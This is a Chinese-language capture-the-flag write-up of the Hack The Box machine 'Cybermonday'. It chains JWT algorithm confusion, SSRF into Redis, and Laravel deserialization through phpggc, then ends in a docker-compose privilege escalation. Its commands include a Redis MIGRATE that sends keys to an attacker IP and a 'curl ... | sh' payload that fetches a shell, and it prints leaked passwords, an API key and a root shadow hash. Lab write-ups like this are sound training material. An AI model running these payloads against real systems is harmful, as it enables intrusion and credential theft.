基本信息
- https://app.hackthebox.com/machines/Cybermonday
- 10.10.11.228
data:image/s3,"s3://crabby-images/0e0d9/0e0d9cd95b4d6362de17f4d03a3cb3e6153784c2" alt=""
端口扫描
22和80:
1 | nmap -sC -sV -Pn 10.10.11.228 |
80
需要加hosts:
1 | 10.10.11.228 cybermonday.htb |
一个在线商城:
data:image/s3,"s3://crabby-images/d721f/d721ff9fe9ccde5825d2de75c4f6fb3ff30602bb" alt=""
cybermonda
随意注册登录,cookie是base64编码json:
data:image/s3,"s3://crabby-images/3189f/3189f6918c2d5c45a98b724014f51db7f2a783c2" alt=""
debug mode
注册时尝试sql注入,例如使用miao'
作为用户名,报错发现开了debug mode:
data:image/s3,"s3://crabby-images/89f8d/89f8d7bfb332715732eb631485ac2c7a8b5e68a2" alt=""
其中可以看到有一个isAdmin属性:
data:image/s3,"s3://crabby-images/a02ea/a02ea286df7f8ec637385af07dd056604e09d639" alt=""
isAdmin
回到正常用户,有一个更新Profile的功能,更新的时候尝试添加isAdmin参数,成功成为管理员,多了一个Dashboard:
data:image/s3,"s3://crabby-images/0b537/0b5372dda94456bbbc37600725f19e006efa8876" alt=""
data:image/s3,"s3://crabby-images/32811/32811ac7a1ab72988012e1a3dfa8267308026c5f" alt=""
Dashboard
changelog中发现webhook子域名,同样添加hosts:
1 | 10.10.11.228 cybermonday.htb webhooks-api-beta.cybermonday.htb |
data:image/s3,"s3://crabby-images/1d215/1d215cf1561bba3647578b42e4e9c77b5aa9eaa8" alt=""
LFI
这里测试还可以发现一个路径穿越导致LFI,nginx配置的问题,配置文件中使用alias,上下不一致:
- 三个案例看Nginx配置安全 | 离别歌
https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html
data:image/s3,"s3://crabby-images/c47ab/c47abb9ccf2a43ef25baea2cf6b0c077b7083f43" alt=""
.git
同样存在git泄漏,结合上面的路径穿越:
1 | http://cybermonday.htb/assets../.git/config |
webhook
访问给出的webhook是404,直接访问根路径给出api信息:
data:image/s3,"s3://crabby-images/dc443/dc443a9f29dfc60fdccfad1cbbeec9d9d5374594" alt=""
x-access-token
根据API注册登录,得到x-access-token是JWT,其中role是user:
data:image/s3,"s3://crabby-images/dd724/dd724a13998954c5e6767dd072cec795357b3823" alt=""
data:image/s3,"s3://crabby-images/7b66a/7b66aee1cbab16503162f950e48d0d576628ec92" alt=""
data:image/s3,"s3://crabby-images/da5d1/da5d1b4bf889cacecc26c4733e4ea86151af30b7" alt=""
Webhooks
使用得到的token查看webhooks,uuid就是dashboard里显示的那个:
data:image/s3,"s3://crabby-images/63afa/63afa73c5fd6ce7a6a7cc5ab7c881036fbaef14c" alt=""
现有的action是createLogFile,根据API调用,响应成功,但不知道写入位置:
data:image/s3,"s3://crabby-images/161b1/161b1f6ce920b194a0db626e419752688bcb05a1" alt=""
当前token因为是user,创建webhook无权限
JWT
基础的探测可以发现jwks.json:
1 | http://webhooks-api-beta.cybermonday.htb/jwks.json |
data:image/s3,"s3://crabby-images/b86b8/b86b8ebc8fca11f6161b7e2e792d4bf8bed5a094" alt=""
Algorithm confusion
现有信息,有jwks,有user的jwt,需要admin的jwt,这种场景:
- Algorithm confusion attacks | Web Security Academy
https://portswigger.net/web-security/jwt/algorithm-confusion - JWT Vulnerabilities (Json Web Tokens) - HackTricks
https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens#change-the-algorithm-rs256-asymmetric-to-hs256-symmetric-cve-2016-5431-cve-2016-10555
根据参考资料内容,首先提取出公钥,然后倒入到Burp扩展中测试利用:
1 | python3 ~/Tools/jwt_tool/jwt_tool.py -t http://webhooks-api-beta.cybermonday.htb/webhooks -rh "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6NSwidXNlcm5hbWUiOiJtaWFvIiwicm9sZSI6InVzZXIifQ.cIue1XS4uxo6dUVE8XLsMlFHrXghXju0mTtKvr9mzAUezYku6z8JAQuWHWsvnNesdqZCbHgKIsegWFe4H-k-PgxewNHWpdB8gy90r0k2J4oS7Ddo0_79SApjKgKOuXF1gYDmpKYu1IK2wmeVF7v6tkhPDsJmEgXWEBnHvmAWCP70PIBtgGUXqI25L7BxLmkPnnItX4lvvRrr7Vcm7x7XFfzvAI_ZdfsBYZaDRC6wqGnFsQtt7zIEXriUgPrQZpIe_nHXWOAqfifSDDyOCWOorxu8WKIJ2pSb0wi9ujMSxmzqMKPccZuGZlasGMneoYSCbEedJZPvOMJHFGfBYwAq_g" -V -jw jwks.json |
导入Burp扩展后,修改jwt内容,使用Attack->HMAC key Confusion方式,选择我们导入的pem,签名后发送,现在我们是admin,可以创建新的webhook使用sendRequest action:
data:image/s3,"s3://crabby-images/d8320/d8320af0027731c392095f8a7662557afa6028d6" alt=""
data:image/s3,"s3://crabby-images/94ecb/94ecb583ba3374ae4b4abb8ea4f69893c02472c2" alt=""
sendRequest
现在可以调用我们创建的webhook使用sendRequest方法,根据api是url和method两个参数,url必须http协议,method可以任意:
data:image/s3,"s3://crabby-images/b7e78/b7e78d58b64739ef04f37b13984d2cf01780d3f1" alt=""
data:image/s3,"s3://crabby-images/83d75/83d75c5ee55aa039a0557e518d2c4dd5429eab9f" alt=""
redis slaveof
已有条件只能SSRF,根据前面LFI中得到的一些信息,尝试使用redis的slaveof:
1 | {"url":"http://redis:6379","method":"slaveof 10.10.16.2 6379\r\n\r\n"} |
可以接收到来自redis的ping请求:
data:image/s3,"s3://crabby-images/b7334/b7334692db08f0a6df8bf8cc2287ff821b914f7c" alt=""
修改请求通过主从获取redis中数据(主站那里正常登录触发):
1 | {"url":"http://redis:6379","method":"EVAL 'for k,v in pairs(redis.call(\"KEYS\", \"*\")) do redis.pcall(\"MIGRATE\",\"10.10.16.2\",\"6379\",v,0,200) end' 0\r\n*1\r\n$20\r\n"} |
data:image/s3,"s3://crabby-images/b1660/b1660cf24eecceeaf904d086c4e2e7ff1065f0ab" alt=""
Laravel
现在已有条件,可以控制Laravel用到的redis,那就可以尝试修改redis中的数据来打反序列化:
注意修改payload中对应的长度,以及引号和斜杠的转义:
1 | ~/Tools/phpggc/phpggc Laravel/RCE10 system 'curl 10.10.16.2:7777' |
data:image/s3,"s3://crabby-images/701c1/701c105e4edfc1faf303774de45f65b8e5ef61d9" alt=""
发送后回到首页刷新,触发反序列化:
data:image/s3,"s3://crabby-images/a9438/a943888cea96b78b77fab114fc7a52e666004196" alt=""
cookie decrypt
redis中的key是session id,也可以直接从cookie中解密得到,需要的app_key在前面的env中可以得到:
- Laravel - HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/laravel#decrypt-cookie
1 |
|
shell
同样的反序列化方法,得到www-data shell:
1 | ~/Tools/phpggc/phpggc Laravel/RCE10 system 'curl 10.10.16.2:7777/shell | sh' |
data:image/s3,"s3://crabby-images/0726d/0726d78fb0808da6ac327993a42f5740f832f0d3" alt=""
Docker
前面的env中也可以知道CHANGELOG_PATH="/mnt/changelog.txt"
,去查看mnt目录发现user .txt,但当前没有权限读取:
data:image/s3,"s3://crabby-images/f4d64/f4d64479e89f7493bc69a4c9b11eb602561e6e6e" alt=""
docker Registry
容器内很多命令都没有,简单的探测,根据hosts知道网段,registry默认5000端口一个个探测,发现172.18.0.3(不固定,也可能是其他ip):
data:image/s3,"s3://crabby-images/1328f/1328fafc19fea6927cbd65176e33113ccabcb714" alt=""
然后就是转发端口:
1 | local |
dump:
- 5000 - Pentesting Docker Registry - HackTricks
https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry - Syzik/DockerRegistryGrabber: Enumerate / Dump Docker Registry
https://github.com/Syzik/DockerRegistryGrabber
1 | python3 DockerGraber.py http://127.0.0.1 --list |
data:image/s3,"s3://crabby-images/d9ce1/d9ce182df026db94daee10f9937915419defc713" alt=""
LogsController
dump得到的文件中读代码,LogsController中发现list和read的action,需要用的api key在heapers/apis.php里:
1 | $this->api_key = "22892e36-1770-11ee-be56-0242ac120002"; |
data:image/s3,"s3://crabby-images/2779f/2779fa01f61bb7dfe142cd7a5a9a7d2354a02b5a" alt=""
list只能看action是createLogFile的webhook的日志目录,read也有很多过滤:
data:image/s3,"s3://crabby-images/1e3ac/1e3ac44127d7d60bc46d4fa365f1d9f58ff6dae3" alt=""
data:image/s3,"s3://crabby-images/57916/57916137ad56f28b1128aa666087c94995db18fd" alt=""
Logs LFI
根据前面的代码,过滤规则是:
- 不允许出现
../
- 会去掉空格
- 文件名中中必须包含
log
那如果是. ./
,这样的,能够通过第一层校验,然后空格被去掉变成了正常的../
:
data:image/s3,"s3://crabby-images/389d0/389d03e151b2bffbabfe124eed1fa1643d46e4c0" alt=""
读取环境变量信息,得到一个密码:
1 | DBPASS=ngFfX2L71Nu |
data:image/s3,"s3://crabby-images/82da1/82da11618e66aa1c21214268d3608648798f3c52" alt=""
另外容器内读文件可以知道用户名是john:
data:image/s3,"s3://crabby-images/956a9/956a955c1f7926fccbe9d4c50d537fc1e3e8f9dc" alt=""
user flag
得到的用户名密码登录:
1 | ssh john@10.10.11.228 |
data:image/s3,"s3://crabby-images/a53c8/a53c8562f33ed08984105b6e15d3e4eaeb50f853" alt=""
提权信息
sudo可以运行一个py调用docker-compose:
data:image/s3,"s3://crabby-images/7c1e2/7c1e2db3c55a6713790018d20a5a473e9d861c8e" alt=""
查看内容,就是调用docker-compose加载运行yml文件之前进行各种检查:
- 白名单路径
- read only
- 不允许软链接
- no privileged
通过检查之后就是docker-compose up --build
我们指定的yml文件
很容易想到的方法是磁盘映射到容器,并且容器启动时可以自动执行命令来得到容器shell进行后续操作,所以就是准备一个恶意yml文件进行利用:
- Compose file version 3 reference | Docker Docs
https://docs.docker.com/compose/compose-file/compose-file-v3/#devices
secure_compose.py
1 | #!/usr/bin/python3 |
提权 & root flag
宿主机查看磁盘信息确认是sda1,然后就是准备恶意yml文件后运行,得到的容器shell内debugfs读文件:
1 | john@cybermonday:~$ lsblk |
data:image/s3,"s3://crabby-images/e0edb/e0edb093b858703dffea58cd5c88547dcfabfe4b" alt=""
data:image/s3,"s3://crabby-images/4bf2e/4bf2e5cd688cd2933576b281a90bb9b7c2c7f81a" alt=""
miao.yml
1 | version: "3.0" |
shadow
1 | root:$y$j9T$kndrQlLwiIgjD3Jegw0bP0$8gT7HQZoAIe6owK9kIDzj4qriqKfygMooOkk5go9i40:19506:0:99999:7::: |
参考资料
- 三个案例看Nginx配置安全 | 离别歌
https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html - Algorithm confusion attacks | Web Security Academy
https://portswigger.net/web-security/jwt/algorithm-confusion - JWT Vulnerabilities (Json Web Tokens) - HackTricks
https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens#change-the-algorithm-rs256-asymmetric-to-hs256-symmetric-cve-2016-5431-cve-2016-10555 - Laravel - HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/laravel#decrypt-cookie - 5000 - Pentesting Docker Registry - HackTricks
https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry - Syzik/DockerRegistryGrabber: Enumerate / Dump Docker Registry
https://github.com/Syzik/DockerRegistryGrabber - Compose file version 3 reference | Docker Docs
https://docs.docker.com/compose/compose-file/compose-file-v3/#devices